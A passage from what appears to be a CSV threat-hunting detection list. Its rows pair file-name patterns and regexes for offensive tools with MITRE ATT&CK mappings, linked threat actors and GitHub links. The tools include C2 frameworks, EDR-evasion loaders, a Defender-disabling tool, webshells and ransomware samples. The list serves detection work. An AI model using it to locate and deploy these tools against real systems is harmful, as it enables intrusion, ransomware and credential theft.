- TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - 
LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","N/A","10","10","268","45","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z","6918" "*/ELMALISEKER Backd00r.asp*",".{0,1000}\/ELMALISEKER\sBackd00r\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","6919" "*/ElusiveMice.git*",".{0,1000}\/ElusiveMice\.git.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","1","N/A","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","6920" "*/email_spoof_checks.txt*",".{0,1000}\/email_spoof_checks\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","#linux","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","6921" "*/EmailAll.git*",".{0,1000}\/EmailAll\.git.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - 
TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","6922" "*/emailall.py*",".{0,1000}\/emailall\.py.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","N/A","6","8","715","117","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z","6923" "*/embedded/framework/msfdb-kali*",".{0,1000}\/embedded\/framework\/msfdb\-kali.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-omnibus","1","1","N/A","N/A","10","3","268","213","2025-04-18T13:17:56Z","2015-02-26T18:42:09Z","6924" "*/EmbedInHTML.git*",".{0,1000}\/EmbedInHTML\.git.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. 
and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","6925" "*/EmbedInHTML/*",".{0,1000}\/EmbedInHTML\/.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","N/A","N/A","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","6926" "*/emotet.profile*",".{0,1000}\/emotet\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - 
Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","6927" "*/Empire.git",".{0,1000}\/Empire\.git","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6928" "*/empire/client/*",".{0,1000}\/empire\/client\/.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6929" "*/empire:latest*",".{0,1000}\/empire\:latest.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - 
T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6930" "*/empire_exec.py*",".{0,1000}\/empire_exec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6931" "*/empire-chain.pem*",".{0,1000}\/empire\-chain\.pem.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - 
T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","6932" "*/EmpireProject*",".{0,1000}\/EmpireProject.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire-GUI","1","1","N/A","N/A","10","5","495","146","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z","6933" "*/enable_all_tokens.exe*",".{0,1000}\/enable_all_tokens\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository 
dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6934" "*/EnableAllMacros_AMSI.py*",".{0,1000}\/EnableAllMacros_AMSI\.py.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6935" "*/EnableAllMacros_AMSI.vba*",".{0,1000}\/EnableAllMacros_AMSI\.vba.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","6936" "*/EnableAllTokenPrivs.exe*",".{0,1000}\/EnableAllTokenPrivs\.exe.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","6937" "*/EnableAllTokenPrivs.git*",".{0,1000}\/EnableAllTokenPrivs\.git.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","6938" "*/EnableAllTokenPrivs.ps1*",".{0,1000}\/EnableAllTokenPrivs\.ps1.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","1","N/A","N/A","7","1","13","5","2024-05-17T12:43:43Z","2024-02-17T15:39:25Z","6939" "*/enable-defender.exe*",".{0,1000}\/enable\-defender\.exe.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","1","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","6940" "*/enable-user.py*",".{0,1000}\/enable\-user\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","6941" "*/enableuser/enableuser.x64.*",".{0,1000}\/enableuser\/enableuser\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6942" "*/enableuser/enableuser.x86.*",".{0,1000}\/enableuser\/enableuser\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","6943" "*/enc_shellcode.bin*",".{0,1000}\/enc_shellcode\.bin.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","6944" "*/enc_shellcode.h*",".{0,1000}\/enc_shellcode\.h.{0,1000}","offensive_tool_keyword","ReflectiveNtdll","A Dropper POC with a focus on aiding in EDR evasion - NTDLL Unhooking followed by loading ntdll in-memory which is present as shellcode","T1059 - T1059.003 - T1218.011 - T1027 - T1027.005 - T1070 - T1070.004","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/reveng007/ReflectiveNtdll","1","1","N/A","N/A","10","2","170","24","2023-02-10T05:30:28Z","2023-01-30T08:43:16Z","6945" "*/Encryfer-X.exe*","NA","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","6946" 
"*/Encrypor-X.exe*",".{0,1000}\/Encrypor\-X\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","1","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","6947" "*/EncryptedZIP.exe*",".{0,1000}\/EncryptedZIP\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6948" "*/encryption_aes.exe*",".{0,1000}\/encryption_aes\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6949" "*/encryption_rc4.exe*",".{0,1000}\/encryption_rc4\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation 
tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6950" "*/endpoint_takeover.py*",".{0,1000}\/endpoint_takeover\.py.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","6951" "*/enip-info.nse*",".{0,1000}\/enip\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6952" "*/enum__secrets/*.py*",".{0,1000}\/enum__secrets\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6953" "*/enum_av.md*",".{0,1000}\/enum_av\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6954" "*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","6955" "*/enum_av.py*",".{0,1000}\/enum_av\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6956" 
